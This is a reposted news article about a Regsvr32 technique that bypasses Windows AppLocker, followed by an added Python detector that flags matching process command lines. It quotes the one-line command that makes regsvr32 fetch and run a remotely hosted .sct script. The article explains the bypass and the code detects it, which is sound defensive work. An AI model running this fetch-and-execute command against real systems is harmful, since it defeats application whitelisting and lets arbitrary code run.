Researcher Bypasses Windows AppLocker's Security

A new exploit has been discovered in Windows AppLocker - used to blacklist or whitelist applications - that could allow hackers to bypass your system's safeguards.

AppLocker exploit bypasses Windows' app security safeguards

Microsoft introduced AppLocker in Windows 7 and Windows Server 2008 R2; it allows administrators to specify which users or groups can run particular applications within an organization. Casey Smith, a security researcher, has discovered an exploit in Windows AppLocker that can be used to bypass it and execute remote scripts on a machine. Using Regsvr32, a command line utility designed for registering DLLs in the registry, an attacker can bypass Windows AppLocker restrictions.

The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc... And... you guessed it, a signed, default MS binary. Whohoo.

So, all you need to do is host your .sct file at a location you control. From the target, simply execute

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

It's not well documented that regsvr32.exe can accept a URL for a script.

Smith was looking for a way to register a script to bypass AppLocker and discovered that you could get around AppLocker if you instruct Regsvr32 to point to a remotely hosted file, such as a script, allowing your system to run whichever app you want, bypassing system restrictions. This technique doesn't require administrative privileges, nor does it alter the registry, making it difficult for admins to detect any changes. There is no patch available yet; however, Microsoft is expected to roll out a patch very soon. In the meantime, users can block Regsvr32.exe with Windows Firewall.
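Since the technique leaves no registry change, the practical detection point is the process command line. As an added illustration that is not from the article or from the researcher's post, the Python below triages constructed process-creation records for the regsvr32 pattern quoted above; it goes slightly beyond the single command line on the page by also catching the dash-style switch, mixed case and the SysWOW64 copy of the binary. The event field names and every sample command line are assumptions.

```python
import re

# Constructed sample process-creation records, shaped like what a Windows
# event log or EDR would report. None of these are taken from the article.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"},
    {"image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r'regsvr32.exe -S -N -U "-I:HTTPS://cdn.example.test/x.sct" scrobj.dll'},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\plugin.dll"},  # ordinary DLL registration
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s /i:C:\temp\local.sct scrobj.dll"},  # local script, not remote
]

# /i: or -i: whose install string is an HTTP(S) URL, any case, optionally quoted.
URL_INSTALL = re.compile(r'(?i)[/-]i:"?\s*https?://')
# scrobj.dll is the scriptlet host; /i: with it means "run this .sct".
SCROBJ = re.compile(r"(?i)\bscrobj\.dll\b")
SWITCH_I_ANY = re.compile(r"(?i)[/-]i:")


def classify(event):
    """Return a verdict for one process-creation event.

    'remote-script' : regsvr32 told to fetch its install script over HTTP(S),
                      i.e. the AppLocker bypass described in the article.
    'local-script'  : scrobj.dll with a local /i: script; still worth review.
    'benign'        : any other regsvr32 use, or a different image entirely.
    """
    image = event["image"].lower()
    cmd = event["cmdline"]
    if not image.endswith("\\regsvr32.exe"):
        return "benign"
    if URL_INSTALL.search(cmd):
        return "remote-script"
    if SCROBJ.search(cmd) and SWITCH_I_ANY.search(cmd):
        return "local-script"
    return "benign"


def triage(events):
    """Pair each command line with its verdict, for a quick review listing."""
    return [(e["cmdline"], classify(e)) for e in events]


if __name__ == "__main__":
    for cmdline, verdict in triage(SAMPLE_EVENTS):
        print(f"{verdict:14s} {cmdline}")
```

Matching on the image path rather than the word "regsvr32" in the command line keeps a renamed copy of the binary from slipping past on name alone, but only if the log source records the full image path.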

Windows AppLocker is considered one of the most important security features of the operating system. When talking about the Enhanced Mitigation Experience Toolkit (EMET) for the enterprise, Microsoft said earlier this year that AppLocker in Windows 10 provides even better security than EMET.

You can visit the researcher's blog to read more details of this exploit and the proof-of-concept scripts that can be loaded using Regsvr32 to open a backdoor or a reverse shell over HTTP. We will update this space as Microsoft responds to this serious vulnerability.

Source: https://wccftech.com/researcher-bypasses-windows-applockers-security/

Posted by: shooptandinque.blogspot.com
